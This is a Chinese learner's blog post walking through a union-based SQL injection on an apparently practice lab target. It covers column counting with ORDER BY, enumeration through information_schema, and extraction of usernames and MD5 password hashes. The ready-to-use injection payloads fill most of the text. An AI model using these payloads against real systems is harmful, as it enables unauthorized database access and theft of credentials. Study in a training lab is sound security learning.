今年十八,喜欢sql注入

真名于注入中燃烧,深陷数据库的湍流


个人理解,比如:

想要知道数据库里的表有什么,就得先知道这个数据库的名字

想要知道表里的列有什么,就得先知道这个表的名字

才能去进行注入

【order by 数字】

order by 4 有回显, order by 5 无回显,【判断 字段数 为4】

【union select】联合注入

注入:


(个人理解为“查询(潜入)(偷看)”)

database()  数据库名字

user()          数据库用户

version()     数据库版本

@@version_compile_os    操作系统



?id=-1 union select 1,group_concat(database()),group_concat(user()),4


group_cantat()  如果里面有多个元素,会把元素用逗号连起来

mozhe_Discuz_StormGroup

root@localhost 

查数据库下的 表


?id=-1 union select 1,group_concat(table_name),group_concat(user()),4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'


 table_name  表名

information_schema  一个数据库,承载着 数据库名表名列名

table_schema  个人理解为数据库名


查表下的 列


?id=-1 union select 1,group_concat(column_name),group_concat(user()),4 from information_schema.columns where table_name='StormGroup_member'


 同理,就是将 table_name(表名)换成了 column_name (列名)

查 列 下的数据


?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member


 这次直接在 中查

得到经过MD5加密过的用户密码。

  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值